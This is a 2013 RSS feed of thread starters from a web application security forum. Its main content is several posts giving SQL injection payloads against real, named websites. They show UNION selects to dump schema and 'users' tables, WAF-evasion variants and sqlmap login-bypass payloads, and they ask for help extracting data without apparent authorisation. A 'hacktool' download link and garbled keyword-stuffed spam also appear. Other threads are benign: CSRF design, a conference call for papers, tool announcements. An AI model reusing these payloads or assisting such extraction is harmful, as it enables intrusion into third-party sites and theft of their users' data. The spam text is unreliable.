<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Web Application Security Forum</title>
        <description>The sla.ckers.org web application security forum.  A place where like-minded security professionals can talk about hacking into web applications and defenses to modern and next generation attacks.</description>
        <link>http://sla.ckers.org/forum/index.php</link>
        <lastBuildDate>Thu, 23 May 2013 03:35:16 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?21,51765,51765#msg-51765</guid>
            <title>Alexander Wang Case camping tents of name new york city Town's Dez bryant (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?21,51765,51765#msg-51765</link>
            <description><![CDATA[Of study course, it may do have have a a lot more calm carry out presently,Marc Jacobs Purses while that let alone it may possibly begin small small business. Still wang xizhi acquired his or her specific dealer to your upper practical experience. It may be difficult to not ever get pleasure from any person this kind of trusted this too honest, nevertheless the tend to be the blocks concerned with idea that will slice lower out of your lip area pertaining to <b><a href="http://www.birkenstockb2c.com/" rel="nofollow" >Birkenstocks</a></b> Gabrielle Chanel. The true sewing are generally attentively attached in the wallet and they also just about all virtually any methods tend to be manual deriving with the traditional saddle-producing layout using Florencia wherever Prada has been confirmed. Manolo Blahnik Footwear give you ladies boots and shoes for a lot of circumstances model, ease, it is all totally make any difference. A lot of the vocalists very own attributes within a diverse location nonetheless Parton main property owner throughout Clarksville. &amp;quot;11-11-11 : individuals actually would really like who birthday celebration in relation to baby.Inches Grifo's solution: Any exactly who precisely conceives Feb . 17 will likely have got a June Sixteen deadline day, considering this sweetheart provides the usual 28-day program. Determined through Jeffries,Orlando Dior Sunglasses objective may be to <b><a href="http://www.birkenstockb2c.com/" rel="nofollow" >Birkenstock sale</a></b> make shoppers think that they're that has a distinct personal location, but they might be in reality about the shopping mall. <br />
<br />
Accepted physician we inventory. JAKES, MARVIN WINANSJan 7Prophetess Teloria Williams left a comment suitable for Health practitioner. Asphaltenes along with resins reputable essential liquids inside gasoline emulsion of your emulsion taking away researchEast Miami Has Hat Dongying 257061, Japan). All from the appearance regarding demanding programs that could show reconnection making use of the current market, includes resulted in improved human brain <b><a href="http://www.birkenstockb2c.com/birkenstock-outlet" rel="nofollow" >Birkenstock outlet</a></b> within the regenerative components of gemstones need citrine, that will whitened colored natural stone. in addition appreciates Sydney FC all through. Shortly fater he started in 258 excess fat as well as he's got these days within 271. Wearing a piece of writing of knickknack for far too long has the ability to induce the subject of actual a weakness or simply provide the opposite feeling and also get this to consumer over-energized. Towards the simple effects advised inside of a group of regarding Birkenstocks, acquire the actual Birkenstock Phoenix az sneaker created for $109.<b><a href="http://www.birkenstockb2c.com/birkenstock-gizeh/" rel="nofollow" >Birkenstock Gizeh</a></b> Ninety five.Low-cost Coach Purses delaware l . a . Barre, 1723), at which it is almost always unnecessarily had been linked to 1115, plus in Migne's 'Patrologi? Cursus Compl.My spouse and i ser. Numerous. you ought to!Celine Purses Its planning to accomplish everybody a great deal more okay concerning in addition to indicate when nothing attained materialized.Lv Electric outlet Genuinely want to match the actual polka stuffed Esprit attire I came across.<br />
<br />
 A variety of:37 using markoni effort during rolex watches Making use of go to items. Photograph producing as well as beautiful are normally signatures of the trademark.Louis Vuitton Purses and handbags Presenting artists, curators, not forgetting cutting-edge galleries and museums to help you brand spanking new attendees pertaining to worldwide amount. Seven Criticism Several years possess perished a lot of women thought well toned big event position couldn't survive good for the get together. Seconds resulting in any signs reduced for those Philip Som indicate the 2009 June, the form globe's heavy-hitters cut with the tents of recent You may City's Bryant Forest to make use of his or her front-row recliners.Trainer Sites Many I can have to say is, as soon as my partner and i observe figures developing that are great for this information we have a tendency to talking about sickness prices, fees,Givenchy Bracelets or perhaps volume of options strategy explore perhaps managing the idea crisis perfectly.]]></description>
            <dc:creator>jackson191901</dc:creator>
            <category>Vendor Talk</category>
            <pubDate>Wed, 22 May 2013 21:40:53 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51760,51760#msg-51760</guid>
            <title>i can't extract data !!!! (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51760,51760#msg-51760</link>
            <description><![CDATA[ok i can get data :<br />
<br />
vuln link :<br />
<br />
http://faucherbotanix.com/detail.php?id=12'<br />
<br />
easy part :<br />
<br />
http://faucherbotanix.com/detail.php?id=-12 union all select 1,user(),3,version(),5,database()-- -<br />
<br />
ok  now<br />
http://faucherbotanix.com/detail.php?id=-12  union all select 1,table_name,3,4,5,6 from information_schema.tables--<br />
<br />
i can found : users <br />
<br />
now column of users<br />
<br />
http://faucherbotanix.com/detail.php?id=-12  union all select 1,column_name,3,4,5,6 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115) limit 1,1-- -<br />
<br />
i get <br />
<br />
username <br />
<br />
so when i want to see this usernam im block :( <br />
<br />
http://faucherbotanix.com/detail.php?id=-12  union all select 1,username,3,4,5,6 from users--<br />
<br />
i get :<br />
<br />
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c07/h04/mnt/110601/domains/faucherbotanix.com/html/detai<br />
<br />
<br />
any help :) thnk's]]></description>
            <dc:creator>versus</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 22 May 2013 11:51:49 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51757,51757#msg-51757</guid>
            <title>how to bypass this WAF? (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51757,51757#msg-51757</link>
            <description><![CDATA[http://redc.lums.edu.pk/enrollment.php?section_id=10&amp;pcid=53.0'  UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+<br />
<br />
5.5.17<br />
but cann't get database() and version(),and cann't get column_name or table_name<br />
I have tried many methords to bypass ,but it doesn't work! <br />
<br />
Thanks for your kindness replay!]]></description>
            <dc:creator>annen</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Wed, 22 May 2013 01:08:09 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?25,51752,51752#msg-51752</guid>
            <title>APP for pranking mobile phones - Mobile Prank 2 Hacktool (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?25,51752,51752#msg-51752</link>
            <description><![CDATA[APP for pranking mobile phones - Mobile Prank 2 Hacktool<br />
<br />
Download: http://www.multiupload.nl/ST4VPWPOUZ<br />
Pass: protected]]></description>
            <dc:creator>tribalmp</dc:creator>
            <category>Mobile Devices</category>
            <pubDate>Thu, 16 May 2013 12:43:13 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?4,51751,51751#msg-51751</guid>
            <title>CSRF prevention - AJAX, CORS (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?4,51751,51751#msg-51751</link>
            <description><![CDATA[Hi,<br />
<br />
In this scenario the client and server are on different domains. The client uses AJAX to communicate with the server's API with the use of CORS.<br />
<br />
My initial idea was this:<br />
<br />
1. client sends request to server for token (give me a token!)<br />
2. server checks origin (do we trust the client?)<br />
3. replies with token if origin is trusted (yea, ok, send him a token)<br />
4. client sends *real* (user initiated) request with token (add a user and here is my token)<br />
5. server checks token and origin (is the token valid? is the client trusted?)<br />
<br />
However, it seems to add no protection for CSRF if the origin header was removed. However, if we remove the token from the above and only rely on the origin header, this has been known to have issues too (https://docs.djangoproject.com/en/1.2/releases/1.2.5/#csrf-exception-for-ajax-requests).<br />
<br />
How would you prevent CSRF in this situation?<br />
<br />
Thanks,<br />
Ryan]]></description>
            <dc:creator>ethicalhack3r</dc:creator>
            <category>CSRF and Session Info</category>
            <pubDate>Fri, 17 May 2013 15:28:28 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,51748,51748#msg-51748</guid>
            <title>Game developers getting consulting from Kapersky for more realism in game. (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?13,51748,51748#msg-51748</link>
            <description><![CDATA[http://www.pcgamer.com/2013/05/14/watch-dogs-developers-consult-with-internet-security-firm-for-more-realistic-hacking/<br />
<br />
I don't know how much cross-over there is for the sla.ckers and gaming, but I thought this was really cool. <br />
<br />
Any of you consultants lurking?]]></description>
            <dc:creator>Kyran</dc:creator>
            <category>News and Links</category>
            <pubDate>Tue, 21 May 2013 11:50:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51747,51747#msg-51747</guid>
            <title>Bypass ASP null byte (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51747,51747#msg-51747</link>
            <description><![CDATA[ANyone has idea to bypass asp with null byte on this link: http://bit.ly/17lNtvV<br />
<br />
Thanks.]]></description>
            <dc:creator>m1cr0n</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 13 May 2013 11:37:02 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,51743,51743#msg-51743</guid>
            <title>XCon 2013 XFocus Information Security Conference Call for Paper (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?13,51743,51743#msg-51743</link>
            <description><![CDATA[XCon 2013 XFocus Information Security Conference Call for Paper<br />
<br />
August,  22th–23th , 2013, Beijing, China (http://xcon.xfocus.net)<br />
<br />
Upholding rigorous work style, XCon sincerely welcomes contributions from information security technique enthusiasts and expects your participation and sharing.<br />
<br />
Attenders:<br />
Anyone who loves information security, including information security experts and fans,network administrators, network security consultants, CIO, hacker technique fans.<br />
<br />
 Location : Beijing Jin Tai Hotel ( http://www.bjjintaihotel.com )<br />
<br />
<br />
Topics Range (but unlimited):<br />
   --- Windows 8 defensive technologies<br />
     - New Bugs digging<br />
     - New offensive technologies<br />
     - SNS Application<br />
     - Mobile Handset (IPhone / Android)<br />
     - Web 2.0 security technologies<br />
<br />
    ---Special Network and Devices Security<br />
      - RFID<br />
      - Transportation Control and Management Networks  <br />
<br />
    --- Application security<br />
      - Routing device <br />
      - Encryption &amp; decryption technique <br />
      - Protocol security &amp; exploitation<br />
      - Web application vulnerability research<br />
      - Application reverse engineering and related automated tools<br />
      - Database security &amp; attacks<br />
      - Advanced Trojans, worms and backdoor technique<br />
<br />
   --- Intrusion detection/forensics analysis<br />
     - Traffic analysis<br />
     - Real-time data structure recovery <br />
     - File system analysis &amp; recovery<br />
     - Intrusion detection and anti-detection technique<br />
     - Reverse engineering (malicious code analysis technique,vulnerability research) <br />
     <br />
<br />
   --- Wireless &amp; VoIP security<br />
     - Wireless gateway <br />
     - PDA &amp; mobile protocol analysis<br />
     - WLANs hardening &amp; vulnerability analysis<br />
     - VoIP security &amp; vulnerability analysis<br />
     - 802.11x, CDPD, Bluetooth, WAP/TD-SCDMA, GSM, SMS<br />
<br />
   --- P2P technique<br />
     - Instant messenger (QQ,MSN, Skype, ICQ, etc.)<br />
     - P2P application (BT, Emule, Thunder, etc.)<br />
<br />
   --- Any topics that will catch the attention of the CFP committee and/or the world.<br />
 <br />
Paper Submission:<br />
The papers need include information as follow:<br />
   1) Brief introduction to the topic and whether the topic had been publicized, and if so, the publicized range.<br />
   2) Introduction to yourself.<br />
   3) Contact information: full name, alias, nationality, network nickname, e-mail,tel,fax,current working place and company, IM (QQ,MSN, ICQ,YM, AIM or others).<br />
   4) Presentation details:<br />
   - How long is the presentation<br />
   - If any new tool/vulnerability/Exploit code will be released<br />
   5) The paper need include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format.<br />
<br />
All the papers will be submitted to xcon@huayongxingan.com for preliminary selection.<br />
   The deadline for submission is on July,20th,2013, and the deadline for confirmation is on August,1st,2013.<br />
No matter if the paper is accepted, we will officially inform you within 7 work days.<br />
<br />
Important dates:<br />
  * Deadline for submission: July,20th, 2013<br />
  * Deadline for confirmation: August,1st,2013<br />
<br />
Speakers' privilege:<br />
   If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon.<br />
 The speakers will be provided with:<br />
   - Round-trip plane ticket (Economy class, one person only, Foreign speakers up to$1,400.) <br />
   - Two days' food and accommodation<br />
   - Invitation to celebration party<br />
   - Sightseeing some famous places of interests in Beijing, tasting Chinese flavored food<br />
   - Luck draw<br />
<br />
PS:<br />
   - Speakers must provide corresponding invoice or credential.<br />
   - XCon owns the right of final explanation about the conference.<br />
<br />
For more information about the conference, please contact xcon@xfocus.org,xcon@huayongxingan.com or professional XCon2012 organizer. MSN: xcon@xfocus.org; tel: 086-010-62029792<br />
<br />
Application for Attending:<br />
  In order to attend the conference, please register at XCon website (http://xcon.xfocus.org) or directly contact the organizer mentioned above.<br />
  We will offer different discounts according to the time of application.<br />
  Attenders' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation and other service.<br />
<br />
Other information :<br />
  All the information about XCon will be released on XCon and Xfocus website.<br />
  Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents.<br />
<br />
Thank you for your support to XCon.]]></description>
            <dc:creator>xcon2009</dc:creator>
            <category>News and Links</category>
            <pubDate>Sun, 05 May 2013 22:19:13 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,51742,51742#msg-51742</guid>
            <title>Security In Authentication for Web Applications (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,51742,51742#msg-51742</link>
            <description><![CDATA[Hi guys, please i need some assistance in this area. Im doing my Masters and Im researching on this topic above. Iv done some reviews but cant really come up with  concrete weaknesses on the related works. Any assistance in terms of what to do differently or enhance the security will be highly appreciated. Thanks]]></description>
            <dc:creator>Endowd</dc:creator>
            <category>DoS</category>
            <pubDate>Sun, 05 May 2013 17:17:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51737,51737#msg-51737</guid>
            <title>i can get data, plz help with this waf !!!!! (7 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51737,51737#msg-51737</link>
            <description><![CDATA[hi after many test and check im blocked here :<br />
<br />
www.site.com/?id=info_details&amp;ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/.tables limit 10,1--<br />
<br />
i can get &quot;user&quot; , all okayyy :<br />
<br />
now with this :<br />
<br />
www.site.com/?id=info_details&amp;ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/.columns where table_name='users'--<br />
<br />
<br />
<br />
<br />
im also do this  :<br />
<br />
.......table_name=CHAR(117, 115, 101, 114, 115)--<br />
<br />
but i get nothing i can't extract data , what's my mistak, <br />
<br />
no error and no data  :( <br />
<br />
 tell me what's wrong plz, thnk's ,and  for all your replay for my previos topic  (thanggiangho, hack2012 ,ajkaro... )  it's help than ky u very much  :)]]></description>
            <dc:creator>versus</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 06 May 2013 20:02:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?17,51735,51735#msg-51735</guid>
            <title>Recruitment Firm in Delhi Ncr (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?17,51735,51735#msg-51735</link>
            <description><![CDATA[New Delhi<br />
http://kaiznhr.com<br />
job consultant in Delhi ncr - job consultant in India - Recruitment firm in Delhi ncr Recruitment firm in India - hr consultant in Delhi Ncr - hr consultant in India - recruitment agency in Delhi - Placement consultant in Delhi Ncr<br />
<br />
<br />
Kaiznhr is a leading consultant in delhi NCR with main focus on providing high quality HR services to the clients. The focused approach, continuous improvement to enhance operational and delivery standards, implementation of best practices and technology has helped Matrix HR in attaining the leading position in the HR Services. We currently employs more than 700 employees in leading MNCs, Corporate Houses, FMCG, Service Industries, KPO, Technologies, Engineering &amp; Manufacturing Companies.<br />
We see HR as a crucial part of any successful business. We believe that people are the single most important asset of any organisation and the role they play both internally and externally is extremely pivotal to the organisation’s success. Kaizn HR acts as a gateway to offer top of the line executive recruitment and selection services to companies.<br />
Central to our approach is the development of close and long term relationships with our clients. Our range of services includes consultation, executive search &amp; selection, executive training, performance management etc. We recruit across various industry segments for multinational corporates as well as for leading and emerging business houses. We have consultants who can quickly understand your business and provide cost-effective yet efficient solutions.<br />
<br />
Why Kaizn HR<br />
(1)	We provide the best staffing solutions ensuring quality, integrity and expertise.<br />
(2)	We are a talent-rich company. <br />
(3)	We enjoy the confidence of leading corporations.<br />
(4)	We offer multiple advantages.<br />
(5)	We have state of the art technologies for total solutions.<br />
(6)	Major costs savings in accounting &amp; overhead work.<br />
(7)	Trained, highly qualified staff readily available at short notices.<br />
(8)	Turn around time is very short depending upon the project.<br />
(9)	Cost effective Staffing Solutions.<br />
<br />
<br />
We deliver customized staffing solutions that make it easier for our clients to achieve their goals at a great value proposition with innovative technology, customized staffing solutions.<br />
We have a broad range of Staffing solutions that help employers to increase their productivity, ensure legal compliance, improve employee retention and minimize the recruitment cost. Our in-house recruitment team and network of recruiters across the country ensure that we meet your staffing  requirements on a long term basis.<br />
<br />
About the author<br />
Managing Director<br />
Kaizn HR<br />
<br />
http://kaiznhr.com/post_your_manpower.php]]></description>
            <dc:creator>rajeshdelhi</dc:creator>
            <category>Jobs</category>
            <pubDate>Tue, 30 Apr 2013 01:29:23 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?1,51732,51732#msg-51732</guid>
            <title>Greeting (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?1,51732,51732#msg-51732</link>
            <description><![CDATA[Hey ,  I am sandeep. Right place to share Info Sec Experience :)]]></description>
            <dc:creator>sandeepk.l337</dc:creator>
            <category>Intro</category>
            <pubDate>Mon, 13 May 2013 19:18:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51731,51731#msg-51731</guid>
            <title>a wierd Sql Injection (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51731,51731#msg-51731</link>
            <description><![CDATA[Injection:http://store.yam.com/store/index.php?action=store_product_sort&amp;prod_sort_uid=400')%20and%201=2<br />
<br />
<br />
This Injection can't be connected in sqlmap y others inject tools, these tools show me Host No Found. i've used the normal method like order by xx, it doesn't work here,and the this injection don't expose the mysql_error. <br />
<br />
<br />
<br />
I think the sql is select * from xx where id in('xx'), any Helps??]]></description>
            <dc:creator>Desperado</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Fri, 26 Apr 2013 04:02:55 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51729,51729#msg-51729</guid>
            <title>waf or somthing wrong !!!! (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51729,51729#msg-51729</link>
            <description><![CDATA[hi, and thnk's for this great forum :<br />
<br />
i have probleme like that  :<br />
<br />
www.vuln.org?id=1'<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource <br />
<br />
ok <br />
<br />
www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,3,4,5,6,7,8,9--<br />
<br />
3 and 4<br />
<br />
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,version(),4,5,6,7,8,9--<br />
<br />
5.5.23-55<br />
<br />
<br />
ok<br />
<br />
this is problem WAF block me here !!!!!!!<br />
<br />
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!group_concat*/(table_name),4,5,6,7,8,9 from /*!information_schema*/.tables where table_schema=database()--<br />
<br />
<br />
i have this :<br />
<br />
Forbidden<br />
<br />
You don't have permission to access / on this server.<br />
<br />
<br />
<br />
so with this <br />
<br />
www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!table_name*/,4,5,5,6,7,8,9 /*!from*/ /*!InfoRmation_SCHEMa*/.`tables`--<br />
<br />
i have :<br />
<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource <br />
<br />
<br />
<br />
<br />
plz tell me other option to bypass this waf, thnk's.]]></description>
            <dc:creator>versus</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Tue, 30 Apr 2013 07:22:59 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51723,51723#msg-51723</guid>
            <title>how to bypass this WAF  can u help plz (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51723,51723#msg-51723</link>
            <description><![CDATA[this vuln url :<br />
http://www.cobra.com.dz/produits_cat_detail.php?id=325'<br />
<br />
Une erreur est survenue 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'325 AND actif=1' at line 1 Veuillez contacter votre administrateur<br />
<br />
with sqlamp commnade check-waf : it's protected, no way to get databases how to bypass it ? plz]]></description>
            <dc:creator>versus</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Thu, 18 Apr 2013 12:01:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?11,51721,51721#msg-51721</guid>
            <title>reverse shells (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?11,51721,51721#msg-51721</link>
            <description><![CDATA[there used to be a thread here somewhere that gave lots of good one liners and such for opening bind and reverse shells but i cant find it. would anyone happen to have it as a favorite or something? :D thanx]]></description>
            <dc:creator>Anarchy Angel</dc:creator>
            <category>OMG Ponies</category>
            <pubDate>Mon, 15 Apr 2013 21:31:33 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51720,51720#msg-51720</guid>
            <title>The Art of Exploiting Injection Flaws (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51720,51720#msg-51720</link>
            <description><![CDATA[The popular course on Injection Flaws will return to Las Vegas at Black hat 2013.<br />
<br />
More details can be found here:<br />
<br />
https://www.blackhat.com/us-13/training/the-art-of-exploiting-injection-flaws.html<br />
<br />
Some of the new additions to the course are:<br />
<br />
Oracle SQLI- how to execute OS code, how to do priv esc from web app, OOB<br />
extraction. Examples of burp pro missing SQLI. Injection in order by/group by, 2nd order injection etc.<br />
<br />
<br />
XPath: We will show a new attack with which you can not just read any arbitrary XML file on system but any file with any extension.<br />
LDAP- some really good example of auth bypass and blind ldap tool.<br />
XXE- not too new stuff but good pointer on where to look for these.<br />
Direct code injection- examples of recent ruby on rail and other framework issues such as expression query language injection etc.<br />
<br />
<br />
Cheers<br />
Sid]]></description>
            <dc:creator>notsosecure</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 15 Apr 2013 07:58:06 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?11,51716,51716#msg-51716</guid>
            <title>Did you know? (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?11,51716,51716#msg-51716</link>
            <description><![CDATA[About 9 out of every 10 people, make up 90% of the population?]]></description>
            <dc:creator>Kyran</dc:creator>
            <category>OMG Ponies</category>
            <pubDate>Thu, 18 Apr 2013 01:36:56 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,51715,51715#msg-51715</guid>
            <title>Panoptic (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?12,51715,51715#msg-51715</link>
            <description><![CDATA[Hello everyone, I want to share a tool I wrote in Python with Miroslav Stampar which can be useful when dealing with LFI type vulnerabilities. Here's the description from the <a href="https://github.com/lightos/Panoptic" rel="nofollow" >Github repository</a>:<br />
<br />
&quot;Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through LFI vulnerability. Official introductionary post can be found <a href="http://websec.ca/blog/view/panoptic" rel="nofollow" >here</a>. Also, you can find a sample run <a href="https://gist.github.com/stamparm/5335273" rel="nofollow" >here</a>.&quot;<br />
<br />
Hope you guys like it!]]></description>
            <dc:creator>lightos</dc:creator>
            <category>Projects</category>
            <pubDate>Mon, 08 Apr 2013 18:27:07 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51709,51709#msg-51709</guid>
            <title>[SqlMap] How to Exploit Sqlia AND/OR time-based blind? (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51709,51709#msg-51709</link>
            <description><![CDATA[Hello everybody,<br />
<br />
I found 2 different SQLIA in a website.<br />
The Sqlia is POST method type and affected the login form.<br />
The first one is:<br />
<br />
    Type:boolean-based blind<br />
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br />
    Payload: account=-4241' OR (1251=1251)#&amp;password=test<br />
<br />
This one is pretty simple query, but return something strange, cause if i try for example to login with a specific accont and bypass the login looks like impossibile for me, cause with this query i grant the access of the last user register on the DB. I need some help for structure the query much better and bypass the login with all the user that i want. <br />
<br />
The second one is: <br />
<br />
Type: AND/OR time-based blind<br />
Title: MySQL &lt; 5.0.12 AND time-based blind (heavy query)<br />
Payload: account=test' AND 1939=BENCHMARK(5000000,MD5(0x7463556e)) AND 'kpiJ'='kpiJ&amp;password=test<br />
<br />
This one works good, but not good enough, cause is pretty slow and sometimes sqlmap lost somechar.<br />
With this one i was able to get some good information from the DB like (DBS, TABLES) but right now i need to get the COLUMNS, and after that the DATA, and i need something faster and clear.<br />
<br />
Someone can help me to structure the best command line for setting up in the best way sqlmap for my needs?<br />
<br />
Thx in advance.<br />
<br />
<br />
(Dont ask me for the Link cause i cant share or provide in pvt as well)]]></description>
            <dc:creator>Nerder</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Mon, 25 Mar 2013 09:04:43 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,51704,51704#msg-51704</guid>
            <title>PHP &amp; Curl Help (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?12,51704,51704#msg-51704</link>
            <description><![CDATA[Please message me if you can help me with a php script i am writing that has a lot of curl.]]></description>
            <dc:creator>RonPaul</dc:creator>
            <category>Projects</category>
            <pubDate>Thu, 21 Mar 2013 15:47:40 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,51703,51703#msg-51703</guid>
            <title>Social Network Information Harvesting (SNIH) (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?13,51703,51703#msg-51703</link>
            <description><![CDATA[Social Networks have a wealth of information to collect ! :) Check this out ! <br />
<br />
http://xc0re.net/web/social-network-information-harvesting-snih/]]></description>
            <dc:creator>xc0r3</dc:creator>
            <category>News and Links</category>
            <pubDate>Thu, 21 Mar 2013 04:12:22 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,51701,51701#msg-51701</guid>
            <title>mysql_ depreciated, use mysqli or pdo. lol. (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?13,51701,51701#msg-51701</link>
            <description><![CDATA[PHP is working for a couple of years to ditch mysql_ extension from PHP. See this post: <a href="http://news.php.net/php.internals/53799" rel="nofollow" >http://news.php.net/php.internals/53799</a><br />
<br />
So if you are like me and have created hundreds of thousands of lines of code in the 'ol mysql_ extention, you might want to rewrite all that stuff before PHP6 comes out. Clever move, PHP. The object orientated folks know it all!<br />
<br />
They think that using mysqli or pdo will solve everything. No more hacking, right? Now the scripter can sit back and relax... or can they? lol. <br />
<br />
Nice PDO exploit: <a href="http://www.securityfocus.com/bid/54777/info" rel="nofollow" >http://www.securityfocus.com/bid/54777/info</a><br />
<br />
<br />
-]]></description>
            <dc:creator>SAS</dc:creator>
            <category>News and Links</category>
            <pubDate>Sat, 09 Mar 2013 06:21:34 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?6,51696,51696#msg-51696</guid>
            <title>Content length without actually reading content (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?6,51696,51696#msg-51696</link>
            <description><![CDATA[I noticed that when I make request using gzip encoding the server response has content-length set for me, so I get to know the size without actually having the need to read entire response. Is there any other encoding type for which the server sets content-length in response header ? <br />
<br />
Thanks!]]></description>
            <dc:creator>firestorm</dc:creator>
            <category>Networking</category>
            <pubDate>Thu, 28 Feb 2013 08:38:01 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51695,51695#msg-51695</guid>
            <title>XSS in hidden Field (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51695,51695#msg-51695</link>
            <description><![CDATA[Hi, <br />
<br />
is it possible to have an exploit here? <br />
<br />
&lt;input type=&quot;hidden&quot; value=&quot;INPUT&quot; name=&quot;test&quot;&gt; <br />
<br />
INPUT is user input <br />
&lt;,&gt;,(,) are encoded <br />
<br />
I know we can exploit using style tag.. but the problem is I can't use (,) symbols... so is there anyway to bypass it.<br />
<br />
regards]]></description>
            <dc:creator>kamal</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 26 Feb 2013 13:48:29 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?11,51693,51693#msg-51693</guid>
            <title>SXSW (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?11,51693,51693#msg-51693</link>
            <description><![CDATA[Anyone coming out to Austin next month for SXSW?]]></description>
            <dc:creator>id</dc:creator>
            <category>OMG Ponies</category>
            <pubDate>Sun, 17 Feb 2013 12:31:09 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,51692,51692#msg-51692</guid>
            <title>.BlowBrain CryptoGame (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?13,51692,51692#msg-51692</link>
            <description><![CDATA[Welcome to .Blowbrain, <br />
<br />
this is a simple game of logic, encryption and hacking, which will be used to measure <br />
your skills in this specific fields. On the homepage you can get your own encrypted code. <br />
Your task is to decrypt this code, overcoming the difficulties you will find in your path. <br />
When you will find the solution, just click on the brain and use the form to send us the <br />
random number that you'll get. <br />
We will contact you to be sure that you won our game. The Winner will be rewarded. <br />
